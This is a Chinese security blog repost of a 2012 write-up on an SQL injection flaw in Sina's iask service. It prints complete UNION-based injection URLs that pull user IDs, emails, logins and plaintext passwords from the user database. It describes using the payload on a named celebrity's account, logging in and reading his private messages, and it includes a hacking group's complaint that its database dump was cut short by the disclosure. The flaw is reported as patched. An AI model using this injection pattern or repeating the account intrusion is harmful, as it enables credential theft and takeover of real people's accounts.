2012年新浪微博用户密码泄露漏洞(图片解析)

admin 2021年4月3日20:06:34评论22 views字数 2317阅读7分43秒阅读模式

2012-1-14 15:22:03 补充:

是不是此人发现的漏洞,真实性有待考证,以下内容转自:http://gov.com.im/web_design/2012/0112/2b-hacker.html


今天回家上核攻击的博客逛了逛,看了一篇文章,让我震精四座啊!

标题【2012年新浪微博用户密码泄露漏洞】

原文地址:https://lcx.cc/post/2116/#

相关截图:

点击文章一看,发现这不是我们4 Fucker Team小组上个星期发现的漏洞么,

漏洞的发现是小组的两个人

1.小宝发现的注入

2.华香构造的语句

这人不在我们的群怎么会知道呢,原来他是 华香 的现实朋友。

上个星期小组还在脱新浪的数据库,速度比较缓慢的。在群的内部网站有分享了。

数据库才脱了不到10W 他便把这个漏洞提交给 新浪,很快新浪把密码全改了。

我靠,这不坑人么?为了装逼 为了装逼 为了装逼!!!!!!!!!!!!!

新浪倒很感谢他,我去。林子大了什么人都有。

不爽啊啊啊啊啊啊 啊啊啊啊啊 咆哮啊啊啊啊!!!!!!!!!!!!!!!!!

付:大黑阔一张


相关厂商:www.sina.com

文章作者:http://weibo.com/evilniang

发现时间:2012-1-1

漏洞类型:sql注射

危害等级:高

漏洞状态:已修复

首先申明:该漏洞发现后本人已联系新浪官方修复漏洞,目前漏洞以修补。文章内容公布,仅供参考学习。

新浪网iask存在sql注射漏洞,利用漏洞可读取iask数据库内内容。包括明文密码在内的7000多W新浪用户信息。

漏洞存在点: http://iask.sina.com.cn//prize/event_getorderlist.php?id=999999.9

漏洞利用方式:

http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=1303977362+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--

这里我们通过构造数据库查询语句获得用户uid=1303977362的uid、login、email、passwd等信息。通过修改字段还可以获取其他信息 。

直接举个例子比如我们通过新浪微波查找到刘谦,点击他的个人资料。我们可以再浏览器地址栏处看到刘谦的uid(新浪用户数字id),此处uid为12715428867

直接构造地址

http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--

直接获得刘谦的账号和密码

这里账号是luchenmagic密码为2lo*****(保密)

尝试登陆

成功登陆。刘谦微薄。这里你可以看看你的偶像的各种私信,聊天记录之类的。

接下来的事情你可以自由发挥了。但是对于一个黑客而言,这只不过是一个开始而已(这里我并无恶意,拿刘谦的账号来测试只是为了致敬,希望有机会能够见证奇迹!)。

后话:

1.2011年年底的csdn、天涯等用户库的泄露只不过是冰山一脚。

2.新浪在csdn、天涯等用户库泄露后申称新浪数据库并没有泄露,而且密码是密文保存。这里要提出质疑了,数据库密码明明是明文保存。至少iask中大部分用户是明文保存密码(部分用户查不到密码)。至于用户信息是否泄露,这个不用说了把?

3.网络泄密涉及到太多。不管是普通网民,还是明星名人,都被牵涉进来。这里测试不少明星,基本上都能通过微薄获取他们的私人信息,甚至登陆他们的msn。(香港爆料杂志来找我把。开个玩笑。。。)

4.这个漏洞发现后我便通知了新浪官方,新浪在漏洞反馈和应急处理这方面做的不够快。收到漏洞后连给我回个邮件或者表示感谢都没有。(我是无私奉献白帽子,被活雷锋了。)

5.祝新年快乐。

----------------------------------------------------

游侠补充:

刚从流量统计系统看到阅读者暴增,原来是文中例子的主角刘谦先生在微博发了一条……好吧:这个事情,仅仅是刘谦先生的粉丝在做个安全测试,并无恶意。我们都喜欢刘先生的魔术。

谢谢刘谦先生给我博客打广告……来西安我请你吃肉夹馍、羊肉泡馍——管饱! 2012年新浪微博用户密码泄露漏洞(图片解析)

另:文章是新浪打了补丁之后作者才发出来的,看到本文的时候还想测试的话……晚了。嘿嘿

留言评论(旧系统):

【匿名者】 @ 2012-01-06 09:36:28

他手上有库、。。

本站回复:

通过注入点拖几千万数据,得好多天……

流亡青年 @ 2012-01-14 01:27:30

这鸟人,拿我们群的东西去提交!!!!!!
详情:http://gov.com.im/web_design/2012/0112/2b-hacker.html

本站回复:

最恶心这种人了,内容已修改。。。

文章来源于lcx.cc:2012年新浪微博用户密码泄露漏洞(图片解析)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日20:06:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2012年新浪微博用户密码泄露漏洞(图片解析)http://cn-sec.com/archives/325521.html

发表评论

匿名网友 填写信息